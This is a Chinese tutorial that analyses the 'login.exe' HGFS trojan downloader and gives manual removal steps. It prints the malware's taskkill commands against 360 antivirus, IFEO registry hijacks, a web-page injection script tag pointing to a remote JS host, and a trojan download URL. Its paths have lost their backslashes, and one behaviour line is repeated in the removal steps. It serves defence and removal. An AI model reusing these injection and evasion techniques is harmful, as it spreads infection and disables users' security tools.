login.exe HGFS木马下载器的手动查杀方法_病毒查杀教程-查字典教程网

样本信息：File:login.exe

Size:25428bytes

Modified:2008年4月25日,16:30:08

MD5:9777E8C79312F2E3D175AA1F64B07C11

SHA1:4236D76C4FAEFE1CDF22414A25E946E493E0D52E

CRC32:5A562203

1.病毒初始化:创建互斥量HGFSMUTEX，保证系统内只有一个实例在运行

2.释放如下文件或者副本

%systemroot%system32Autorun.exe

%systemroot%system32Autorun.inf

%systemroot%system32connnet.bat

%systemroot%system32int.exe

并复制到如下启动文件夹中达到开机启动自身的目的

C:DocumentsandSettingsAdministrator「开始」菜单程序启动login.exe

C:DocumentsandSettingsAllUsers「开始」菜单程序启动login.exe

C:DocumentsandSettingsDefaultUser「开始」菜单程序启动login.exe

3.执行connnet.bat批处理内的内容

a.遍历d~z盘复制%systemroot%system32Autorun.inf和%systemroot%system32Autorun.exe到其根目录下

b.判断中毒机器是否处于局域网，如果是则利用ipc漏洞建立一个空连接，并把autorun.exe和%autorun.inf复制到机器的C$下面。

4.IFEO劫持某些杀毒软件

HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions360safe.exe

HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions360tray.exe

HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionsravmon.exe

HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionsravmond.exe

HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionsravstub.exe

HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionsravtask.exe

指向c:我就不给你启动.exe

5.试图结束360软件

cmd/ctaskkill/im360safe.exe/f

cmd/ctaskkill/im360tray.exe/f

6.遍历所有磁盘删除.gho文件

7.遍历所有磁盘感染asp，htm，html，aspx，php等文件

在其尾部加入<scriptlanguage=javascriptsrc=http://down.******.cn/1.js></script>的代码

8.链接网络下载木马

http://17vp.cn/down/gr.exe到

C:ProgramFilesInternetExplorer1.exe

但链接已经失效

解决方法：

1.复制如下文字到剪贴板(假设系统在C盘)

%systemroot%system32Autorun.exe

%systemroot%system32Autorun.inf

%systemroot%system32connnet.bat

%systemroot%system32int.exe

并复制到如下启动文件夹中达到开机启动自身的目的

C:DocumentsandSettingsAdministrator「开始」菜单程序启动login.exe

C:DocumentsandSettingsAllUsers「开始」菜单程序启动login.exe

C:DocumentsandSettingsDefaultUser「开始」菜单程序启动login.exe

打开Xdelbox.exe

在下面的大框中单击右键点击“剪贴板导入不检查路径”

之后刚才复制的那个文件列表将出现在下面的大框中

然后再在下面的大框中单击右键点击“立即重启执行删除”

软件会自动重启计算机

重启计算机以后会有两个系统进入的选择的倒计时界面

第一个是你原来的windows系统

第二个是这个软件给你设定的dos系统

不用你管，它会自动选择进入第二个系统

类似dos的界面滚动完毕以后病毒就被删除了

之后他会自动重启进入正常模式

2.打开sreng启动项目注册表

删除所有红色的IFEO项目

3.建议屏蔽http://17vp.cn网站